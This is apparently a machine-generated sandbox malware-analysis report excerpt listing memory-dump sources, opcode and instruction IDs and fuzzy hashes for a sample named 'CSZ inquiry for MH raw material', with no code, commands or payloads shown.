                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 91518bd5a25c694aa9f15cf612c7f7f74d8f3578fd036b1e2cc2f8d324ececcb
                                                • Instruction ID: c0cb3f578720030ee1a3bf3b7cbd01df2dcbd7dec93e6aadf17eb923c360de5c
                                                • Opcode Fuzzy Hash: 91518bd5a25c694aa9f15cf612c7f7f74d8f3578fd036b1e2cc2f8d324ececcb
                                                • Instruction Fuzzy Hash: B5018936110149ABCF12AE84D840EDE3F66FB4C664F068116FE286A220C332D9B0EB91
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: aef279637f63924ff87958c827278d8f7c3f947dfb8dec2200fe7f318bbfb946
                                                • Instruction ID: c4192b562eca99f51f2b831cc75ce5be75a5bf8e460feba051b0cf0315e46c89
                                                • Opcode Fuzzy Hash: aef279637f63924ff87958c827278d8f7c3f947dfb8dec2200fe7f318bbfb946
                                                • Instruction Fuzzy Hash: 7EF08B312002455BF71091088E61F233299F7C0251FA4802FEB048F7E1EA30DC018790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f6194b707217610295005ba60bc9de26fdce0c2b69e54ee83283e58ad0f1dfdb
                                                • Instruction ID: 3186da9d9bf228e4b64b485f12ca811b343e223e18254a0a6c2d8f8dc446c24c
                                                • Opcode Fuzzy Hash: f6194b707217610295005ba60bc9de26fdce0c2b69e54ee83283e58ad0f1dfdb
                                                • Instruction Fuzzy Hash: 3101A470301682ABF3239B2CDD49B293BE4BB80B44F8905A8BA11CF6D6D728D5418620
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction ID: 8b56e942056a8d61313d565c7564f9e2350c9a45856b0c04c185df3303826181
                                                • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                • Instruction Fuzzy Hash: DBF0E93538191347E736AAAE9420B2EAA95BFD0A01B5D452E9611CF680DFA0D8848790
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                • Instruction ID: 60bef89b9fca69d2457d16de869cc19b9564c1954646f1a90ad6516af3a1388f
                                                • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                • Instruction Fuzzy Hash: 7EF054337255129BE321AA4DCC81F1EB7B8FFD5A60F190465A604BF264C760EC018BD0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 21c69c2e999c2eaf3989457f64ee8b4670b7a9ae62327c6103d153abf119fc1c
                                                • Instruction ID: bc4b91c90e69b3d9f403582b0c6e41041cb4f2d764b90de61874d04aff60b0e2
                                                • Opcode Fuzzy Hash: 21c69c2e999c2eaf3989457f64ee8b4670b7a9ae62327c6103d153abf119fc1c
                                                • Instruction Fuzzy Hash: 63F0AF706193059FC310EF68C445A1ABBE4FF98714F804A5AB898DF394E634E900CB96
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                • Instruction ID: b5a31e11784fc009b6626e7faa49017d5106d6a82258844984ad22aafd89a6f4
                                                • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                • Instruction Fuzzy Hash: 45F0B472610205AFE714DF25CC01F56B7E9FFE8344F148478A545DB2A4FAB0ED01C694
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4c5c6bbb829ac9a8555ef3a46bf1005edeab1a62c517690495cb383f9a3dac2
                                                • Instruction ID: 11ee30f95303c0fe12f2ec075d6087e4ba2f8545424b9b313a179280fa95098d
                                                • Opcode Fuzzy Hash: c4c5c6bbb829ac9a8555ef3a46bf1005edeab1a62c517690495cb383f9a3dac2
                                                • Instruction Fuzzy Hash: 17F06270A0124ADFDB04EFA9C515A9EB7F4FF58304F108059B955EF395DA34EA01CB64
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4e2489cca3916a97ac56508a2b58c07dadae15216ffa14c812f99e9ed72864f5
                                                • Instruction ID: dd7dc83b19786d677fb56cef4a83d51551bdf852a90e8bd7036334f464814adc
                                                • Opcode Fuzzy Hash: 4e2489cca3916a97ac56508a2b58c07dadae15216ffa14c812f99e9ed72864f5
                                                • Instruction Fuzzy Hash: 05F024B19126D19FE733CBECC054B25BBC4BF00621F088CAACB498F582C3B0DA80C600
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f928e697f8e4deb2a171a2220a118b0732ae898b477a884541903796e3bf3a86
                                                • Instruction ID: 0dda052f1da670786bb3570782badf91aca182049decef337c03dfc8ab3d2311
                                                • Opcode Fuzzy Hash: f928e697f8e4deb2a171a2220a118b0732ae898b477a884541903796e3bf3a86
                                                • Instruction Fuzzy Hash: 16F0273A41A6C28ECF325F6C6D903E9AB64F7C1810F0A144DD4B19F249C6748487D320
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 951622d772ec82285812cdd6cc25de11287970d39adf58fac22c360b73f11714
                                                • Instruction ID: fae5a222a02b5395d31e9f8cbcad722a65a82d09b3549afa78cab65af139b861
                                                • Opcode Fuzzy Hash: 951622d772ec82285812cdd6cc25de11287970d39adf58fac22c360b73f11714
                                                • Instruction Fuzzy Hash: 33F097714116819FEB32C76CC448B19BBD8FBC07A0F089827C402DF522C730F880DA40
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction ID: cab7c6798bd3b4e557b9005e9cb254ec9c1b24b24a0aa16edffbb17134d1edd6
                                                • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                • Instruction Fuzzy Hash: DDE0D8323006026BE712AE599CC0F477B6EFFD6B14F04407DB5045F251CAF2DC0986A4
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                • Instruction ID: 8eb95827a5f878d95edfa2124e6a256311efee0ec9e10a345453af984fe58397
                                                • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                • Instruction Fuzzy Hash: E3F0A0721002049FE7218F09DD84F52BBF8FB45364F05C026E6088F160E339EC44CBA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction ID: 0536b0bd079a676db0b8161acd8523867a76c57cc922ee66b1094eac1afcb9ef
                                                • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                • Instruction Fuzzy Hash: 32F0E5392047419FEB67CF59C050A997BE4FB413A0B000455FC428F381D735E981CB50
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                • Instruction ID: ba3b67312ab9ddd8fbefb60c90ebb1cab9dcf064dd61e9f37d21a64502ec2e16
                                                • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                • Instruction Fuzzy Hash: FBE0D832254146AFD3212A598800B7A7BE7FBD17A0F150429E200CF150DBF0DC42C7D8
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                • Instruction ID: 6b87887ec5b1c106051fa4555df8540958aabe346f9853377e62d971a2be22fd
                                                • Opcode Fuzzy Hash: 112f46e59a7665649f46ea30997378864f95fed2ae5f09b6f9a3bd72ce31da40
                                                • Instruction Fuzzy Hash: 34F0A931A26A928FE772D7BCE280B5E77E0BB50A20F0A05A4D4108FD12C330EC80C750
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                • Instruction ID: 5ce1dfb9cb368c16d29eddfe25e969e0b0169d1732906491026ab71fd4ae9c05
                                                • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                • Instruction Fuzzy Hash: 01E0DF72A40120BBEB22A7998D05F9EBEACEBD0EA0F090054B600EB0E0E530DE00C6D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                • Instruction ID: 24ec77fb28a4277a6f311d75e137f4cf1c66b67de339270e96584310559d4652
                                                • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                • Instruction Fuzzy Hash: 49E09B316407508BCB359A1DC141A57BFE8FFD5660F15806DE9054B653C231F842C7D0
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 04f34f5b1f6ee4f0b8830eb95e5cb0324cdd7f5dcd55dd11b306c7b96b577592
                                                • Instruction ID: 63a377e5d0ba343eb1f21d599b43054ac3f73c1a9cc456334926b02499712354
                                                • Opcode Fuzzy Hash: 04f34f5b1f6ee4f0b8830eb95e5cb0324cdd7f5dcd55dd11b306c7b96b577592
                                                • Instruction Fuzzy Hash: 12900221242441525685B15984145074046B7E0251799C413B5414D50CC5669956DB21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 849a15faad83c167c71fabd149232fe178688ab8227067c73b2a4c19ed7cc66a
                                                • Instruction ID: dd937aad6266b58cf8435d7a264c952caa2e3b020e9cd723cfb9f41aa0bc32bf
                                                • Opcode Fuzzy Hash: 849a15faad83c167c71fabd149232fe178688ab8227067c73b2a4c19ed7cc66a
                                                • Instruction Fuzzy Hash: 5790023124140402D281715984146060049B7D0251F99C413B4424954EC6958B56AF61
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f14f2d522f43185a49e8b243054d1b4edaa7ca4d7b7dd72ee0b7815447413bd
                                                • Instruction ID: 919ebbc65f0c16aedb9814192e0dddaddfbbf4912b08046c50245481cdb0833f
                                                • Opcode Fuzzy Hash: 5f14f2d522f43185a49e8b243054d1b4edaa7ca4d7b7dd72ee0b7815447413bd
                                                • Instruction Fuzzy Hash: E690023120140842D24071598414B460045A7E0311F59C417B4124A54DC655C9517A21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3bc238817fadb4e1f5fe252d8320e1ceccfa6e216f11027de4cabc3a46e49f5b
                                                • Instruction ID: ce7d70abeea654d6ac7186911146e72d0c04c52e7271196ca678807343f527fc
                                                • Opcode Fuzzy Hash: 3bc238817fadb4e1f5fe252d8320e1ceccfa6e216f11027de4cabc3a46e49f5b
                                                • Instruction Fuzzy Hash: 1290022160540402D280715994287060055A7D0211F59D412B4024954DC6998B556BA1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2f13ad6a5a0367e7e87c8182a65b57a7a14ceae245a87ad6aaf5627184ee550
                                                • Instruction ID: 8d669efc6af242dc3df7cf13f027945232ae23ae3ed0b98e2ba83e1563eb69df
                                                • Opcode Fuzzy Hash: a2f13ad6a5a0367e7e87c8182a65b57a7a14ceae245a87ad6aaf5627184ee550
                                                • Instruction Fuzzy Hash: D590023120140403D240715995187070045A7D0211F59D812B4424958DD69689516621
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ab3028be8e995795b8ad561ac95a698d6b522f87569db0dea0edea80b6cc29b8
                                                • Instruction ID: f58125ca386e485354ccdaaa220ca784b782cad3e7f1a289a83331bc151f68af
                                                • Opcode Fuzzy Hash: ab3028be8e995795b8ad561ac95a698d6b522f87569db0dea0edea80b6cc29b8
                                                • Instruction Fuzzy Hash: 6490023120140402D240759994186460045A7E0311F59D412B9024955EC6A589916631
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 62a31f300e377a493b97f001b7acd6e89c395148632bdd22c2b05d8ec943a8c6
                                                • Instruction ID: ba7faff84e40506d279cdb833f4f7b8e6005dab9bb8a5fafb964f83cf55640a9
                                                • Opcode Fuzzy Hash: 62a31f300e377a493b97f001b7acd6e89c395148632bdd22c2b05d8ec943a8c6
                                                • Instruction Fuzzy Hash: F890026121140042D244715984147060085A7E1211F59C413B6154954CC5698D615625
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 19f6ef417398a7006afa1312cd74c3b8586718fe7010bd9073b70fc5bb7ca5c5
                                                • Instruction ID: ed06092828626b855d748ec973d658a309cf0467646cecd3286e5853fb152c56
                                                • Opcode Fuzzy Hash: 19f6ef417398a7006afa1312cd74c3b8586718fe7010bd9073b70fc5bb7ca5c5
                                                • Instruction Fuzzy Hash: 9E90026134140442D24071598424B060045E7E1311F59C416F5064954DC659CD526626
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: eda500bb7c2ade8748c5ed96984875e28184c764dbfdc500c4d20c57a1f820c8
                                                • Instruction ID: bf2bec37b182b82ee06dc3a952cacdc32a78e37d4a2898afef90e9337a893826
                                                • Opcode Fuzzy Hash: eda500bb7c2ade8748c5ed96984875e28184c764dbfdc500c4d20c57a1f820c8
                                                • Instruction Fuzzy Hash: B3900221211C0042D34075698C24B070045A7D0313F59C516B4154954CC95589615A21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 3ebd2b8ae6e48d9f16589e60571fbfb90a1ccb892de2dbb0f66ff560df8664f0
                                                • Instruction ID: 1c69e19fd469b541a75eb209ed163694cba4bd045887f75d0a723a1decb01ae7
                                                • Opcode Fuzzy Hash: 3ebd2b8ae6e48d9f16589e60571fbfb90a1ccb892de2dbb0f66ff560df8664f0
                                                • Instruction Fuzzy Hash: 4C90023120180402D2407159882470B0045A7D0312F59C412B5164955DC66589516A71
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 98b722d9dfb5d99c892bf2879e0fdbffe1fb14d0c96414dfbc4d0df36bbc353a
                                                • Instruction ID: d04b86c0d2b8e2af63cd59c820b7a5f56df41cecc90d2e7f75a5a0c1b23ad23c
                                                • Opcode Fuzzy Hash: 98b722d9dfb5d99c892bf2879e0fdbffe1fb14d0c96414dfbc4d0df36bbc353a
                                                • Instruction Fuzzy Hash: 749002216014004242807169C8549064045BBE1221759C522B4998950DC59989655B65
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 679221f1036c0c3287ad622c22a96f6967cbf25beffbd06f49579ed50a32faaa
                                                • Instruction ID: 855e1e50a1f4fb666bb540d78617ea921f11570a3c6030eb1551fec613e06e4c
                                                • Opcode Fuzzy Hash: 679221f1036c0c3287ad622c22a96f6967cbf25beffbd06f49579ed50a32faaa
                                                • Instruction Fuzzy Hash: D790023120180402D240715988187470045A7D0312F59C412B9164955EC6A5C9916A31
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d76b0674ad3c284022bb736681f78b88947ee11043716f8c47b7149c7c86406e
                                                • Instruction ID: d245ae64ce447a13370ba8ce5e36038afdbd7d79570106d73d5e420d1288fb90
                                                • Opcode Fuzzy Hash: d76b0674ad3c284022bb736681f78b88947ee11043716f8c47b7149c7c86406e
                                                • Instruction Fuzzy Hash: FD90022130140402D242715984246060049E7D1355F99C413F5424955DC6658A53A632
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2eb2d41f941669d591915ef4b03a6c9794d7954a132ee24ffe907f87ae4cb67a
                                                • Instruction ID: 782cf997cfb575823c96aed82f614ee3ec493baa8608a823b38f3a03f49ef07c
                                                • Opcode Fuzzy Hash: 2eb2d41f941669d591915ef4b03a6c9794d7954a132ee24ffe907f87ae4cb67a
                                                • Instruction Fuzzy Hash: 2790026120180403D280755988146070045A7D0312F59C412B6064955ECA698D516635
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: acc64bad312a32125fc9a85360f6ad4be06630faa58d62aa3a40aabee16e2796
                                                • Instruction ID: 644cc72a4db8c0bc4782a9d3603a08ac52591642dac16e3c84b7f6fba96ebebe
                                                • Opcode Fuzzy Hash: acc64bad312a32125fc9a85360f6ad4be06630faa58d62aa3a40aabee16e2796
                                                • Instruction Fuzzy Hash: CC90022160140502D24171598414616004AA7D0251F99C423B5024955ECA658A92A631
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 0e6c614107898637a8583c6c2d912d01a251a458a6237285955010a2d1e201a4
                                                • Instruction ID: 32dfada8a84ecb8fcf51d27cc09faabba8dd2820fdf1d37fccdb7dfaba89cb0e
                                                • Opcode Fuzzy Hash: 0e6c614107898637a8583c6c2d912d01a251a458a6237285955010a2d1e201a4
                                                • Instruction Fuzzy Hash: 5C90027120140402D280715984147460045A7D0311F59C412B9064954EC6998ED56B65
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2712318aee0cfd41e2d74ed086fc6e6c2ebaacf8e1d91e2c541146a1172d4450
                                                • Instruction ID: cdb9297c07720d45645f23e0954916ef3b80734592b2a1d57d23fc168e1dc57d
                                                • Opcode Fuzzy Hash: 2712318aee0cfd41e2d74ed086fc6e6c2ebaacf8e1d91e2c541146a1172d4450
                                                • Instruction Fuzzy Hash: 3F90022120184442D28072598814B0F4145A7E1212F99C41AB8156954CC95589555B21
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1663919624.00000000014D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 014D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_14d0000_CSZ inquiry for MH raw material.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 2132483b5d1745859e7c7018a3581aa68283569c060d2a7fd8b88d41f60919c9
                                                • Instruction ID: 4842190ef1ce1958fc9ccc3e3d2b66fef9f85b1e9e803dd35ebb83435d3e36c9
                                                • Opcode Fuzzy Hash: 2132483b5d1745859e7c7018a3581aa68283569c060d2a7fd8b88d41f60919c9
                                                • Instruction Fuzzy Hash: F490022124140802D2807159C4247070046E7D0611F59C412B4024954DC6568A656BB1
                                                Memory Dump Source
